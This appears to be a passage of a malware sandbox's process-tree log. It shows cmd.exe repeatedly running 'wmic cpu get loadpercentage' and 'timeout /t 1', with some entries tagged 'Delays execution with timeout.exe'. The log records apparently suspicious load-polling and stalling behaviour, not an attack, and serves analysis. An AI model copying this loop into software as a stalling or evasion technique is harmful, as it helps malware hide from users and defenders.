C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4796
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2752
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:212
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4284
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3800
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4560
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1544
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5064
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1672
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4652
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4696
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:228
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3468
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3912
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2252
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4232
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1636
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:164
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:192
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4576
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4976
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:196
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3376
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4624
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4480
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3936
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4040
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1436
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1072
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4492
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2792
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4104
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4524
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1512
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4400
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3980
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4036
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3028
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1376
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2208
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5028
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3372
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1060
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:832
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2228
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4272
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:764
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:920
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5112
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5032
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2384
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4208
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1604
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3728
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1212
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4600
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:348
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3632
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3436
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2556
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2752
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4560
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2544
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3996
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2452
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3012
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4164
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1304
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4440
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2832
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2532
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1884
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3476
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2292
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3688
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4632
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:200
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3948
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3560
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3540
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3440
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1436
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:508
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3568
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4596
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1280
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3328
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4100
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5104
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:516
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:788
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3228
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2488
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:652
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1520
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4408
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3520
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5068
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2228
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4912
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1440
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2620
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3920
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4792
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4412
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4644
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4276
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3236
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2096
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4080
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3160
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2616
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4268
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4432
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2404
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1544
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3368
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4764
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:404
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4988
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:684
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2492
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:64
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4376
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1044
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1208
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2972
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2872
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3140
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3164
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4944
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1636
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1884
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:192
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:196
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:384
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4480
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3492
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3392
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3516
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4136
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4348
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3308
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4104
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1288
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1512
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4156
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4032
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4400
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5084
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4036
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2660
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1376
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:396
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5028
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4556
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2140
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4760
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1060
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3916
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4952
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2620
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4504
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2896
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3920
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:996
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4412
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4208
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4276
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3728
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3324
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:988
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4608
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4428
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4940
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1892
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4268
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3412
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:440
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:224
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3996
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3368
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4652
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2432
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2364
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2416
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2812
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2804
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1740
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2844
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4440
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1600
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3500
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4672
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4356
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2348
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:192
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1768
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4960
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:196
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:200
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4480
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1448
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3392
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4492
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2528
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3308
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2456
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4104
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4360
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4044
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3564
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3400
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4100
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2340
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:632
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2660
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:8
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:396
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1520
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1964
-
-
